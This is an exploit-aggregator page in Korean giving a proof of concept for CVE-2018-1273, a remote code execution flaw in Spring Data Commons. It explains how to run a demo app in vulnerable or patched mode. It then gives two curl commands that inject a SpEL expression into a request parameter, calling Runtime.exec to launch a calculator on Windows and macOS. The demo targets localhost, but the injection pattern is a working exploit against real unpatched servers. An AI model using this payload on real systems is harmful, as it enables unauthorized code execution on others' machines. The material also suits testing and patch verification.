Sploitus

Exploit for poc

kitploit Β· 2026-08-25

Exploit Code

MARKDOWN54 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-WEBR0CK-POC-CVE-2018-1273
# CVE-2018-1273

Spring Data Commons (버전 1.13λΆ€ν„° 1.13.10, 2.0λΆ€ν„° 2.0.5 및 μ§€μ›λ˜μ§€ μ•ŠλŠ” 이전 버전)μ—λŠ” 특수 μš”μ†Œμ˜ λΆ€μ μ ˆν•œ λ¬΄νš¨ν™”λ‘œ μΈν•œ 속성 바인더 취약점이 μ‘΄μž¬ν•©λ‹ˆλ‹€. μΈμ¦λ˜μ§€ μ•Šμ€ 원격 μ•…μ„± μ‚¬μš©μž(λ˜λŠ” 곡격자)λŠ” Spring Data REST 기반 HTTP λ¦¬μ†ŒμŠ€ λ˜λŠ” Spring Data의 ν”„λ‘œμ μ…˜ 기반 μš”μ²­ λ³Έλ¬Έ 바인딩을 λŒ€μƒμœΌλ‘œ νŠΉμˆ˜ν•˜κ²Œ μ‘°μž‘λœ μš”μ²­ λ§€κ°œλ³€μˆ˜λ₯Ό μ œκ³΅ν•˜μ—¬ 원격 μ½”λ“œ μ‹€ν–‰ 곡격을 μˆ˜ν–‰ν•  수 μžˆμŠ΅λ‹ˆλ‹€.

μžμ„Έν•œ μ •λ³΄λŠ” μ—¬κΈ°μ—μ„œ ν™•μΈν•˜μ„Έμš”.

# μ‹€ν–‰

이 μ• ν”Œλ¦¬μΌ€μ΄μ…˜μ€ μ·¨μ•½ν•œ 버전 λ˜λŠ” μˆ˜μ •λœ λ²„μ „μ˜ Spring Data Commons둜 ν…ŒμŠ€νŠΈν•  수 μžˆμŠ΅λ‹ˆλ‹€.

  * μ·¨μ•½ν•œ 버전 (κΈ°λ³Έκ°’):



root@kitploit:~
    
    
    mvn spring-boot:run
    

  * μˆ˜μ •λœ 버전:



root@kitploit:~
    
    
    mvn spring-boot:run -Dfixed
    

# 취약점 ν…ŒμŠ€νŠΈ

λ‹€μŒ λͺ…령을 μ‹€ν–‰ν•˜μ—¬ 취약점이 μ•…μš©λ  수 μžˆλŠ”μ§€ ν™•μΈν•˜μ„Έμš”.

  * Windowsμ—μ„œ:



root@kitploit:~
    
    
    curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('calc.exe')]=123"
    
    

  * macOSμ—μ„œ:



root@kitploit:~
    
    
    curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('/Applications/Calculator.app/Contents/MacOS/Calculator')]=test"